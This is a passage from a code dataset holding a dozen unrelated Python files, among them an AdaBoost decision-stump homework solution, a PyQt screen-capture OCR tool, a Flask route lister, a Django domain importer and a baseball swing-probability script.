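For example, with X = [1., 2., 3., 4.], Y = [0, 0, 1, 1] and uniform weights, the best cutting point separates {1, 2} from {3, 4}: both sides become pure, so the gain equals the full entropy of Y (1 bit).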
\n        '''\n        #########################################\n        ## INSERT YOUR CODE HERE\n\n        th = -float('inf')\n        g = -1.\n        ent = DS.entropy(Y, D)\n        cp = DT.cutting_points(X, Y)\n        # conditional entropy of each candidate cutting point\n        for i_cp in cp:\n            # X_1/X_2 are only placeholders; the entropies below depend on Y_* and D_*\n            X_1 = np.empty(shape=[1, 0])\n            X_2 = np.empty(shape=[1, 0])\n            Y_1 = np.empty(shape=[1, 0])\n            Y_2 = np.empty(shape=[1, 0])\n            D_1 = np.empty(shape=[1, 0])\n            D_2 = np.empty(shape=[1, 0])\n            for j in range(X.shape[0]):\n                if X[j] <= i_cp:\n                    X_1 = np.append(X_1, 1)\n                    Y_1 = np.append(Y_1, Y[j])\n                    D_1 = np.append(D_1, D[j])\n                else:\n                    X_2 = np.append(X_2, 1)\n                    Y_2 = np.append(Y_2, Y[j])\n                    D_2 = np.append(D_2, D[j])\n\n            d_sub_1_sum = np.sum(D_1)\n            d_sub_2_sum = np.sum(D_2)\n            if d_sub_1_sum != 0:\n                d_sub_1_in = D_1 / d_sub_1_sum\n            else:\n                d_sub_1_in = D_1\n\n            if d_sub_2_sum != 0:\n                d_sub_2_in = D_2 / d_sub_2_sum\n            else:\n                d_sub_2_in = D_2\n            temp_ent_1 = DS.entropy(Y_1, d_sub_1_in)\n            temp_ent_2 = DS.entropy(Y_2, d_sub_2_in)\n\n            cent = d_sub_1_sum * temp_ent_1 + d_sub_2_sum * temp_ent_2\n            g_new = ent - cent\n\n            if g_new > g:\n                g = g_new\n                th = i_cp\n\n        #########################################\n        return th,g \n        \n    #--------------------------\n    def best_attribute(self,X,Y,D):\n        '''\n        Find the best attribute to split the node. The attributes have continuous values (int/float). The data instances are weighted.\n        Here we use information gain to evaluate the attributes. \n        If there is a tie in the best attributes, select the one with the smallest index.\n        Input:\n            X: the feature matrix, a numpy matrix of shape p by n. \n               Each element can be int/float/string.\n               Here n is the number data instances in the node, p is the number of attributes.\n            Y: the class labels, a numpy array of length n. Each element can be int/float/string.\n            D: the weights of instances, a numpy float vector of length n\n        Output:\n            i: the index of the attribute to split, an integer scalar\n            th: the threshold of the attribute to split, a float scalar\n        '''\n        #########################################\n        ## INSERT YOUR CODE HERE\n\n        th = -float('inf')\n        g = -1.\n        for index in range(X.shape[0]):\n            thNext, g_new = self.best_threshold(X[index, :], Y, D)\n            # strict comparison keeps the first (smallest-index) attribute on ties, per the docstring\n            if g_new > g:\n                g = g_new\n                th = thNext\n                i = index\n\n        #########################################\n        return i, th\n        \n    #--------------------------\n    @staticmethod\n    def most_common(Y,D):\n        '''\n        Get the most-common label from the list Y. The instances are weighted.\n        Input:\n            Y: the class labels, a numpy array of length n.\n               Each element can be int/float/string.\n               Here n is the number data instances in the node.\n            D: the weights of instances, a numpy float vector of length n\n        Output:\n            y: the most common label, a scalar, can be int/float/string.\n        '''\n        #########################################\n        ## INSERT YOUR CODE HERE\n\n        uniqueY = np.unique(Y)\n        y_dict = dict()\n\n        for y in uniqueY:\n            indices = np.argwhere(Y == y).flatten()\n            y_dict[y] = sum(D[indices])\n\n        y = max(y_dict, key=y_dict.get)\n\n        #########################################\n        return y\n        \n\n    #--------------------------\n    def build_tree(self, X,Y,D):\n        '''\n        build decision stump by overwriting the build_tree function in DT class.\n        Instead of building tree nodes recursively in DT, here we only build at most one level of children nodes.\n        Input:\n            X: the feature matrix, a numpy matrix of shape p by n. \n               Each element can be int/float/string.\n               Here n is the number data instances in the node, p is the number of attributes.\n            Y: the class labels, a numpy array of length n. 
Each element can be int/float/string.\n D: the weights of instances, a numpy float vector of length n\n Return:\n t: the root node of the decision stump. \n '''\n #########################################\n ## INSERT YOUR CODE HERE\n \n # if Condition 1 or 2 holds, stop splitting \n t = Node(X, Y)\n t.isleaf = False\n t.p = DS.most_common(Y, D)\n t.X = X\n t.Y = Y\n # if Condition 1 or 2 holds, stop splitting\n if DT.stop1(Y) or DT.stop2(X):\n t.isleaf = True\n return t\n\n # find the best attribute to split\n t.i, t.th = self.best_attribute(X, Y, D)\n\n # configure each child node\n t.C1, t.C2 = DT.split(t.X, t.Y, t.i, t.th)\n t.C1.isleaf = True\n t.C2.isleaf = True\n\n lessIndex = np.argwhere(X[t.i] < t.th).flatten()\n greaterIndex = np.argwhere(X[t.i] >= t.th).flatten()\n t.C1.p = DS.most_common(t.C1.Y, D[lessIndex])\n t.C2.p = DS.most_common(t.C2.Y, D[greaterIndex])\n\n\n #########################################\n return t\n \n \n\n#-----------------------------------------------\nclass AB(DS):\n '''\n AdaBoost algorithm (with contineous attributes).\n '''\n\n #--------------------------\n @staticmethod\n def weighted_error_rate(Y,Y_,D):\n '''\n Compute the weighted error rate of a decision on a dataset. \n Input:\n Y: the class labels, a numpy array of length n. Each element can be int/float/string.\n Y_: the predicted class labels, a numpy array of length n. Each element can be int/float/string.\n D: the weights of instances, a numpy float vector of length n\n Output:\n e: the weighted error rate of the decision stump\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n e = np.sum(D[Y != Y_])\n\n #########################################\n return e\n\n #--------------------------\n @staticmethod\n def compute_alpha(e):\n '''\n Compute the weight a decision stump based upon weighted error rate.\n Input:\n e: the weighted error rate of a decision stump\n Output:\n a: (alpha) the weight of the decision stump, a float scalar.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n if e == 0.:\n a = 500\n elif e == 1.:\n a = -500\n else:\n a = 0.5 * np.log((1 - e) / e)\n\n\n\n #########################################\n return a\n\n #--------------------------\n @staticmethod\n def update_D(D,a,Y,Y_):\n '''\n update the weight the data instances \n Input:\n D: the current weights of instances, a numpy float vector of length n\n a: (alpha) the weight of the decision stump, a float scalar.\n Y: the class labels, a numpy array of length n. Each element can be int/float/string.\n Y_: the predicted class labels by the decision stump, a numpy array of length n. Each element can be int/float/string.\n Output:\n D: the new weights of instances, a numpy float vector of length n\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n for i in range(len(Y)):\n if Y[i] == Y_[i]:\n D[i] = D[i] * np.exp(-a)\n else:\n D[i] = D[i] * np.exp(a)\n\n if sum(D) != 1 and sum(D) != 0:\n D *= 1 / sum(D)\n\n\n\n\n #########################################\n return D\n\n #--------------------------\n @staticmethod\n def step(X,Y,D):\n '''\n Compute one step of Boosting. \n Input:\n X: the feature matrix, a numpy matrix of shape p by n. \n Each element can be int/float/string.\n Here n is the number data instances in the node, p is the number of attributes.\n Y: the class labels, a numpy array of length n. 
Each element can be int/float/string.\n D: the current weights of instances, a numpy float vector of length n\n Output:\n t: the root node of a decision stump trained in this step\n a: (alpha) the weight of the decision stump, a float scalar.\n D: the new weights of instances, a numpy float vector of length n\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n ds = DS()\n t = ds.build_tree(X, Y, D)\n Y_ = DS.predict(t, X)\n e = AB.weighted_error_rate(Y, Y_, D)\n a = AB.compute_alpha(e)\n D = AB.update_D(D, a, Y, Y_)\n\n\n #########################################\n return t,a,D\n\n \n #--------------------------\n @staticmethod\n def inference(x,T,A):\n '''\n Given a bagging ensemble of decision trees and one data instance, infer the label of the instance. \n Input:\n x: the attribute vector of a data instance, a numpy vectr of shape p.\n Each attribute value can be int/float\n T: the root nodes of decision stumps, a list of length n_tree. \n A: the weights of the decision stumps, a numpy float vector of length n_tree.\n Output:\n y: the class label, a scalar of int/float/string.\n '''\n #########################################\n\n\n y_list = list()\n for t in T:\n while (not t.isleaf):\n if x[t.i] <= t.th:\n t = t.C1\n else:\n t = t.C2\n y_list.append(t.p)\n\n list_y = list(set([y_list[i] for i in range(len(y_list))]))\n vote_obj = list_y[0]\n vote_num = 0\n for y_value in list_y:\n vote_temp = 0\n for idx in range(len(A)):\n if y_list[idx] == y_value:\n vote_temp += A[idx]\n\n if vote_temp >= vote_num:\n vote_num = vote_temp\n vote_obj = y_value\n y = vote_obj\n\n \n #########################################\n return y\n \n\n #--------------------------\n @staticmethod\n def predict(X,T,A):\n '''\n Given an AdaBoost and a dataset, predict the labels on the dataset. \n Input:\n X: the feature matrix, a numpy matrix of shape p by n. \n Each element can be int/float/string.\n Here n is the number data instances in the node, p is the number of attributes.\n T: the root nodes of decision stumps, a list of length n_tree. \n A: the weights of the decision stumps, a numpy float vector of length n_tree.\n Output:\n Y: the class labels, a numpy array of length n. Each element can be int/float/string.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n\n Y = list()\n for i in range(X.shape[1]):\n Y.append(AB.inference(X[:, i], T, A))\n Y = np.asarray(Y)\n\n \n #########################################\n return Y \n \n\n #--------------------------\n @staticmethod\n def train(X,Y,n_tree=10):\n '''\n train adaboost.\n Input:\n X: the feature matrix, a numpy matrix of shape p by n. \n Each element can be int/float/string.\n Here n is the number data instances in the node, p is the number of attributes.\n Y: the class labels, a numpy array of length n. Each element can be int/float/string.\n n_tree: the number of trees in the ensemble, an integer scalar\n Output:\n T: the root nodes of decision stumps, a list of length n_tree. 
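Each stump votes for its predicted label on x, weighted by the corresponding entry of A below; the label with the largest total weight wins.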
\n            A: the weights of the decision stumps, a numpy float vector of length n_tree.\n        '''\n        #########################################\n        ## INSERT YOUR CODE HERE\n        A = np.zeros(n_tree)\n        # initialize weight as 1/n\n        D = np.ones(len(Y)) / len(Y)\n        # iteratively build decision stumps\n        T = list()\n        for i in range(n_tree):\n            t, a, D = AB.step(X, Y, D)\n            T.append(t)\n            A[i] = a\n\n        #########################################\n        return T, A\n        \n\n\n\n    \n","sub_path":"hw3/problem5.py","file_name":"problem5.py","file_ext":"py","file_size_in_byte":17431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"393704939","text":"from tkinter import *\nfrom tkinter.ttk import *\nfrom serial import Serial\nfrom serial.tools import list_ports\n\ndef foo(event):#function called when '<<ComboboxSelected>>' event is triggered\n    print(v.get())#how to access to combobox selected item\n\n\nroot = Tk()\nroot.wm_geometry(\"400x300\")\nv = StringVar()#a string variable to hold user selection\noptions=list_ports.comports()\nframe = Frame(root)\nframe.pack()\ncombo = Combobox(root,textvariable=v, values=options)\ncombo.bind('<<ComboboxSelected>>',foo)#binding of user selection with a custom callback\ncombo.pack()\nroot.mainloop()","sub_path":"SerialInterface/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"229347505","text":"from flask import Flask,request,Response\nfrom helper.add_resource import add_endpoint\nfrom workers.ichigo import sasuke\n\ntrabajador = sasuke()\ndefault = Flask(__name__)\n\n# @default.route('/', methods=['GET'])\ndef exit():\n    'Display registered routes'\n    rules = []\n    for rule in default.url_map.iter_rules():\n        methods = ','.join(sorted(rule.methods))\n        rules.append((rule.endpoint, methods, str(rule)))\n    for endpoint, methods, rule in sorted(rules):\n        route = '{:50s} {:25s} {}'.format(endpoint, methods, rule)\n        print(route)\n\n    print(\"\\n\\n\")\n    str1 = ' \n
'.join(( endpoint+\" => \"+methods+\"(\"+rule+\")\" ) for endpoint, methods, rule in rules)\n return str1\n\nadd_endpoint(clase=trabajador,funcion=trabajador.ejemplo_funcion, metodos=['post','get'],flask=default)\nadd_endpoint(clase=trabajador,funcion=trabajador.ejemplo_funcion2, metodos=['post','get'],flask=default)\ndefault.run(host='0.0.0.0', debug='1', port='9002')\nprint()\n","sub_path":"flask_using_class/work.py","file_name":"work.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"551552909","text":"import ctypes\nimport sys\n\nimport cv2\nimport numpy as np\n\nfrom PIL import ImageGrab\nfrom PIL.ImageQt import ImageQt\nfrom pytesseract import *\n\nfrom PyQt5 import QtCore, QtWidgets, QtGui\nfrom PyQt5.QtGui import QCursor, QImage, QPainter, QColor, QPen, QBrush, QFont\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import Qt, QSize, QRect\n\nimport papagoApi\n\nuser32 = ctypes.windll.user32\nscreenWidth = user32.GetSystemMetrics(0)\nscreenHeight = user32.GetSystemMetrics(1)\n\n# window error log\ndef catch_exceptions(t, val, tb):\n # QMessageBox.critical(None, \"An exception was raised\", \"Exception type: {}\".format(t))\n old_hook(t, val, tb)\n\nold_hook = sys.excepthook\nsys.excepthook = catch_exceptions\n\nclass CaptureWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n\n captureImage = ImageGrab.grab(bbox=(0, 0, screenWidth, screenHeight))\n self.captureImage = ImageQt(captureImage)\n\n # cv2.destroyAllWindows()\n # cv2.namedWindow('cvImage')\n # cv2.imshow('cvImage', cv2.cvtColor(np.array(captureImage), cv2.COLOR_BGR2RGB)) # 화면을 보여준다.\n\n self.sX = 0\n self.sY = 0\n self.eX = 0\n self.eY = 0\n\n self.drawing = False\n\n self.translatedText = \"\"\n self.translatedTextList = None\n self.drawingText = False\n\n self.initUI()\n\n\n def initUI(self):\n self.setWindowTitle('My First Application')\n\n # 투명 배경색\n # self.setAttribute(QtCore.Qt.WA_TranslucentBackground)\n self.setWindowFlag(QtCore.Qt.FramelessWindowHint) # 프레임바 제거\n self.setWindowFlag(QtCore.Qt.WindowStaysOnTopHint) # 항상 위에 뜨도록\n self.setFocusPolicy(QtCore.Qt.StrongFocus)\n\n self.move(0, 0)\n self.resize(screenWidth, screenHeight)\n self.setFocus(True)\n self.activateWindow()\n self.raise_()\n self.show()\n\n def paintEvent(self, e):\n painter = QPainter(self) # window painter get\n painter.begin(self)\n\n painter.drawImage(self.rect(), self.captureImage, self.captureImage.rect()) # window painter에 전체 스크린샷찍은 image draw\n\n if self.sX != 0 and self.sY != 0 and self.eX != 0 and self.eY != 0 :\n painter.setPen(QPen(QColor(255, 0, 0, 255), 1))\n painter.drawRect(self.sX < self.eX and self.sX or self.eX,\n self.sY < self.eY and self.sY or self.eY,\n abs(self.eX-self.sX),\n abs(self.eY-self.sY))\n\n if self.drawingText:\n fontSize = 15\n margin = 10\n boxHeight = fontSize + (margin * 2)\n boxWidth = fontSize * len(self.translatedTextList[0])\n\n length = len(self.translatedTextList)\n index = 0\n\n for text in self.translatedTextList:\n boxWidth = boxWidth < fontSize * len(text) and boxWidth or fontSize * len(text)\n boxWidth = boxWidth * 2\n for text in self.translatedTextList:\n painter.setPen(QColor(255,255,255))\n painter.setBrush(QColor(255, 255, 255))\n painter.drawRect(self.sX,\n (self.eY + (boxHeight*length) > screenHeight and self.sY - ((index+1)*boxHeight) or self.eY + (index*boxHeight)),\n boxWidth,\n fontSize + (margin * 2))\n\n painter.setPen(QColor(0,0,0))\n painter.setFont(QFont('나눔명조', 
fontSize))\n painter.drawText(self.sX + margin,\n (self.eY + (boxHeight*length) > screenHeight and (self.sY - margin) - (index*boxHeight) or (self.eY + fontSize + margin) + (index*boxHeight)),\n text)\n index = index + 1\n\n painter.end()\n\n def keyPressEvent(self, e):\n if e.key() == Qt.Key_Escape: # esc 종료\n cv2.destroyAllWindows()\n self.close()\n\n def mousePressEvent(self, e):\n if e.button() == Qt.LeftButton:\n self.drawing = True\n self.drawingText = False\n self.sX = e.pos().x()\n self.sY = e.pos().y()\n self.eX = e.pos().x()\n self.eY = e.pos().y()\n\n def mouseMoveEvent(self, e):\n if (e.buttons() & Qt.LeftButton) & self.drawing:\n self.eX = e.pos().x()\n self.eY = e.pos().y()\n\n self.update() # paintEvent 호출\n\n def mouseReleaseEvent(self, e):\n if e.button() == Qt.LeftButton:\n if (self.sX == self.eX) or (self.sY == self.eY) or (abs(self.eX - self.sX) < 10) or (abs(self.eY - self.sY) < 10):\n return\n\n self.eX = e.pos().x()\n self.eY = e.pos().y()\n\n # 테두리 1px 빼고 캡처\n cvImage = self.captureImage.copy(self.sX < self.eX and self.sX or self.eX,\n self.sY < self.eY and self.sY or self.eY,\n abs(self.eX-self.sX),\n abs(self.eY-self.sY)).convertToFormat(4)\n cvW = cvImage.width()\n cvH = cvImage.height()\n ptr = cvImage.bits()\n ptr.setsize(cvImage.byteCount())\n arr = np.array(ptr).reshape(cvH, cvW, 4)\n img = cv2.cvtColor(arr, cv2.COLOR_BGR2GRAY)\n cv2.imshow('gray img', img)\n\n # cv2.destroyAllWindows()\n # cv2.namedWindow('cvImage')\n # cv2.imshow('cvImage', img) # 화면을 보여준다.\n\n img = cv2.resize(img, None, fx=2, fy=2, interpolation=cv2.INTER_CUBIC)\n (thresh, img) = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n cv2.imshow('OTSU img', img)\n\n out_img = cv2.GaussianBlur(img, (3, 3), 0)\n (thresh, out_img) = cv2.threshold(out_img, 127, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n cv2.imshow('cvImage', out_img)\n\n self.translatedText = image_to_string(out_img, config='--tessdata-dir \"tessdata\" -l eng --oem 3 --psm 3')\n print(\"translatedText1: \", self.translatedText)\n self.translatedText = self.translatedText.replace(\"[^a-zA-Z\\s]\", \"\") # 영어, 공백 빼고 다 제거\n\n if not self.translatedText.strip() == \"\" :\n # self.translatedText = papagoApi.translate(self.translatedText) # 번역\n #\n self.translatedTextList = self.translatedText.split('\\n') # 줄바꿈 split\n # print(\"translatedText2: \", self.translatedTextList)\n\n self.drawingText = True\n self.update() # paintEvent 호출\n self.drawing = False\n","sub_path":"captureWindow.py","file_name":"captureWindow.py","file_ext":"py","file_size_in_byte":6776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"225298668","text":"import numpy as np\nimport tensorboardX\nimport os\nfrom typing import List,Dict,Tuple\nnp.random.seed(sum(map(ord, \"aesthetics\")))\n\nclass ResultStruct(object):\n\tdef __init__(self,path:str, resultdict=None):\n\t\tif resultdict is None:\n\t\t\tself.resultdict = {}\n\t\telse:\n\t\t\tself.resultdict = resultdict\n\t\tself.writer = None\n\t\tself.trial = None\n\t\tself.path_str = path\n\n\tdef set_result_dir(self):\n\t\tprint('Deprecated !!!!!!!!!')\n\t\tinput('Do not continue')\n\t\t# if os.path.exists(RESULT_ROOT_DIR):\n\t\t# \tprint('res dir exists')\n\t\t# else:\n\t\t# \tprint('Result dir not found: Creating Result directory')\n\t\t# \tself.mk_dir(RESULT_ROOT_DIR)\n\t\t# path = os.path.join(*self.path_list)\n\t\t# if not os.path.exists(path):\n\t\t# \traise Exception('Path does not exist')\n\t\t# trial = 0\n\t\t# full_path=None\n\t\t# 
while (True):\n\t\t# \tfull_path = os.path.join(path, str(trial))\n\t\t# \tif os.path.exists((full_path)):\n\t\t# \t\ttrial += 1\n\t\t# \t\tcontinue\n\t\t# \telse:\n\t\t# \t\tos.mkdir(full_path)\n\t\t# \t\tbreak\n\n\t\treturn None#full_path\n\n\tdef add_epoch_res_dict(self,resdict:dict,epoch,write):\n\t\tfor i,key in enumerate(resdict.keys()):\n\t\t\tif key in self.resultdict.keys():\n\t\t\t\tself.resultdict[key].append(resdict[key])\n\t\t\telse:\n\t\t\t\tself.resultdict[key] = [resdict[key]]\n\t\t\tif write:\n\t\t\t\tif self.writer is None:\n\t\t\t\t\tself.writer = tensorboardX.SummaryWriter(self.path_str)\n\t\t\t\tself.writer.add_scalar(key,resdict[key],epoch)\n\n\n\n\t@staticmethod\n\tdef write_res_dict(resdict:dict,path:str):\n\t\twriter = tensorboardX.SummaryWriter(path)\n\t\tfor key in resdict.keys():\n\t\t\tlist_val = resdict[key]\n\t\t\tfor epoch,val in enumerate(list_val):\n\t\t\t\twriter.add_scalar(key,val,epoch)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"resultutils/resultstructs.py","file_name":"resultstructs.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"372619007","text":"from .base_controller import BaseController\nfrom MonitoredSystem.services.mongodb_service import MongoDBService\nfrom MonitoredSystem.utils import reformat_response\n\nservice = MongoDBService()\n\n\nclass MongoDBController(BaseController):\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n\n    @staticmethod\n    @reformat_response\n    def get(target_name):\n        result = service.mongodb_stat(target_name)\n        if result:\n            if result[\"query\"] is True:\n                return {\"code\": \"00000\", \"data\": result[\"data\"]}\n            else:\n                return {\"code\": \"10003\"}\n        else:\n            return {\"code\": \"10002\"}\n","sub_path":"MonitoredSystem/controllers/mongodb_controller.py","file_name":"mongodb_controller.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"279000685","text":"\"\"\"\nRe-write this NumPy code so that it is vectorized.\ni.e. 
replace the for loops with only NumPy array operations.\n\nIt might be useful to work this out with a pen and paper before writing the answer.\n\"\"\"\nimport numpy as np\n\n# A matrix defining how different locations (home, work, school) infect other people.\n# Rows are infectors, columns are infectees.\ninfect_matrix = np.array([\n [0.9, 0.05, 0.05],\n [0.05, 0.9, 0.05],\n [0.05, 0.05, 0.9],\n])\n\n# Compartments of people (home, work, school).\ninfectors = np.array([10, 19, 35]) # people who can infect other people\n\ninfected = np.zeros_like(infectors) # number of people who got infected\n\nfor infectee_idx in range(3):\n for infector_idx in range(3):\n infect_factor = infect_matrix[infector_idx, infectee_idx]\n num_infectors = infectors[infector_idx]\n infected[infectee_idx] += infect_factor * num_infectors\n\nprint(\"Number of people infected (home, work, school):\", infected)\n","sub_path":"part_3_2.py","file_name":"part_3_2.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"233203536","text":"# Copyright (c) 2020 SMHI, Swedish Meteorological and Hydrological Institute.\n# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).\n\"\"\"\nCreated on 2020-04-27 12:29\n\n@author: a002028\n\"\"\"\nimport os\nimport time\nfrom sirena.session import Session\nfrom sirena.plotting.widgets import Plot\n\n\nif __name__ == '__main__':\n session_obj = Session(\n reader='wiski',\n station_source='samsa',\n start_time='1700-01-01',\n end_time='2020-12-31',\n )\n\n selected_dataset = 'annual_RH2000'\n print('Read data..')\n start_time = time.time()\n dfs = session_obj.read(\n all_stations=True,\n datasets=[selected_dataset],\n )\n print(\"Data extracted--%.3f sec\" % (time.time() - start_time))\n\n stats = session_obj.get_statistics(\n dfs[selected_dataset],\n stats_for_year=None,\n parameter='RH2000_Year.Mean'\n )\n\n # session_obj.update_station_info()\n\n pp = Plot(\n stations=session_obj.stations,\n statistics=stats,\n output_filename=os.path.join(\n session_obj.settings.base_directory,\n \"export\",\n \"SMISK_VIZ_tst.html\"\n )\n )\n\n pp.show_plot()\n","sub_path":"sirena/tests/test_db_to_plot.py","file_name":"test_db_to_plot.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"171745352","text":"import gzip\nimport os\n\nfrom django.conf import settings\n\nfrom common.command import Command\nfrom common.models import Domain\nfrom common.thread import Thread\nfrom common.utils import chunks\n\n\nclass Worker(Thread):\n\n def run(self):\n count = self.args[0]\n full_names = self.kwargs.get('full_names')\n length = len(full_names)\n self.info('Worker %d: %d names' % (count, length))\n\n domains = [Domain(full_name=full_name) for full_name in full_names]\n\n self.info('Worker %d: %d domains creating' % (count, length))\n Domain.objects.bulk_create(domains)\n self.info('Worker %d: %d domains created' % (count, length))\n\n return\n\n\nclass Command(Command):\n help = 'Add domains list from wwws.io'\n chunk_size = 100000\n\n def add_arguments(self, parser):\n parser.add_argument('num_workers', type=int)\n\n def handle(self, *args, **options):\n self.info('Adding global domains list')\n num_workers = int(options.get('num_workers'))\n\n file_path = os.path.join(settings.DOWNLOADS, 'wwws/')\n files = list(os.walk(file_path))[0][2]\n\n domain_files = [fi for fi in files\n if 
fi.endswith('.txt.gz')]\n        # file_path = os.path.join(settings.DOWNLOADS, 'wwws/',\n        #                          '%s_full.txt.gz' % (tld))\n        # store_path = os.path.join(settings.DOWNLOADS,\n        #                           'domains/%s.trie' % (tld))\n\n        for domain_file in domain_files:\n            self.info(domain_file)\n            tld = domain_file[:domain_file.index('_')]\n\n            domain_file = os.path.join(file_path, domain_file)\n            to_add = []\n            self.info('Starting %s' % (tld))\n            with gzip.open(domain_file, 'rt') as f:\n                to_add = [domain[:-1] for domain in f]\n\n            length = len(to_add)\n\n            self.info('Starting to process %d domains' % (length))\n\n            count = 0\n            subl_count = 0\n            chunk_size = min(int(length/num_workers), self.chunk_size)\n            for subl in chunks(to_add, chunk_size * num_workers):\n                threads = []\n                for full_names in chunks(subl, chunk_size):\n                    count += 1\n                    worker = Worker(args=(count,),\n                                    kwargs={'full_names': full_names})\n                    threads.append(worker)\n\n                for thread in threads:\n                    thread.start()\n\n                # Wait until all threads are done\n                for thread in threads:\n                    thread.join()\n\n                subl_count += 1\n                self.info('Subl: %d' % (subl_count))\n\n        self.info('Done')\n","sub_path":"common/management/commands/add_domains.py","file_name":"add_domains.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"285337960","text":"#Design an algorithm that finds the maximum positive integer input by a user. The user repeatedly inputs numbers until a negative value is entered.\n\nmax_int = 0\n\nwhile True:\n\n    num_int = int(input(\"Input a number: \")) # Do not change this line\n    \n\n    if num_int >= 0:\n        if num_int > max_int:\n            max_int = num_int\n    else:\n        break\n# Fill in the missing code\nprint(\"The maximum is\", max_int) # Do not change this line\n\n# get input from the user\n# raise max_int if num_int is higher\n# check whether num_int is a negative number; if so, print and end\n\n\n","sub_path":"max_int.py","file_name":"max_int.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"433220375","text":"import tensorflow as tf\nimport os\nimport numpy as np\nfrom hyperimage import Hyperimage\n\n\nclass NirGenerator(tf.keras.utils.Sequence):\n\n    def __init__(self, batch_size, train_percent, validate_percent, predict_percent, gen_type):\n        self.batch_size = batch_size\n        self.train_percent, self.validate_percent, self.predict_percent = train_percent, validate_percent, predict_percent\n        if (gen_type != \"train\") and (gen_type != \"validate\") and (gen_type != \"predict\"):\n            raise Exception('gen_type must be \"train\", \"validate\" or \"predict\"')\n        self.gen_type = gen_type\n        self.file_list = os.listdir(os.path.join(os.path.dirname(os.path.abspath(__file__)), \"Dataset\", \"HyKo2\", \"nir\"))\n        self.file_list.sort()\n\n        train_size = int(np.ceil(train_percent * len(self.file_list)))\n        validate_size = int(np.floor(validate_percent * len(self.file_list)))\n\n        if self.gen_type == \"train\":\n            self.file_list = self.file_list[:train_size]\n        elif self.gen_type == \"validate\":\n            self.file_list = self.file_list[train_size:train_size + validate_size]\n        else:\n            self.file_list = self.file_list[train_size + validate_size:]\n\n    def __len__(self):\n        return np.ceil(len(self.file_list) / float(self.batch_size)).astype(np.int)\n\n    def __getitem__(self, batch_idx):\n        hyper_images = []\n        batch_file_list = self.file_list[batch_idx * self.batch_size: (batch_idx + 1) * self.batch_size]\n        for filename in batch_file_list:\n            img_path = 
os.path.join(os.path.dirname(os.path.abspath(__file__)), \"Dataset\", \"HyKo2\", \"nir\", filename)\n hyper_images.append(Hyperimage(img_path))\n\n x_train = np.asarray([img.get_hypercube() for img in hyper_images])\n x_train = x_train[..., np.newaxis]\n\n y_train = []\n for img in hyper_images:\n labels = np.repeat(img.get_label()[:, :, np.newaxis], 25, axis=2)\n y_train.append(labels)\n\n y_train = np.asarray(y_train)\n\n return x_train, y_train\n\n def get_file_list(self):\n return self.file_list\n","sub_path":"Python/nir_generator_ann_full.py","file_name":"nir_generator_ann_full.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"251857813","text":"import pandas as pd\nimport numpy as np\nimport pickle\nimport BaseballUtils\n\nmodel = pickle.load(open('C:\\\\Users\\\\Andrew Moss\\\\PycharmProjects\\\\Rangers_Survey_2\\\\swing_model.sav', 'rb'))\ndata = pd.read_csv('C:\\\\Users\\\\Andrew Moss\\\\PycharmProjects\\\\Rangers_Survey_2\\\\predictors.csv')\n\n\npitchers = pd.read_csv('C:\\\\Users\\\\Andrew Moss\\\\Documents\\\\Pitch_data_rangers_technical2.csv')\npitchers = pitchers.drop_duplicates()\npitchers = pitchers[pitchers['balls'] < 4]\npitchers = pitchers[pitchers['strikes'] < 3]\npitcherTable = BaseballUtils.getNamesFromIDs(pitchers)\n\npitchers = pd.merge(pitchers, pitcherTable, how='left', left_on='pitcher', right_on='pitcher')\ndata['pitcher'] = pitchers.loc[:, 'player_name_y'].values\ndata['zone'] = pitchers.loc[:, 'zone'].values\ndata['out_of_zone'] = np.where(data['zone'] > 9, 1, 0)\ndata = data[data['out_of_zone'] == 0]\ndata['Swing_prob'] = model.predict_proba(data.drop(['Unnamed: 0', 'pitcher', 'is_swing','zone','out_of_zone'],\n axis=1))[:, 1]\ndata['SwUE'] = data['Swing_prob'] - data['is_swing']\ndata = data[data['pitcher'].notna()]\nby_pitcher = data.groupby('pitcher').mean()\nby_pitcher = by_pitcher.sort_values(by='SwUE', ascending=False)\n\nby_pitcher.loc[:, 'SwUE'].\\\n to_csv('C:\\\\Users\\\\Andrew 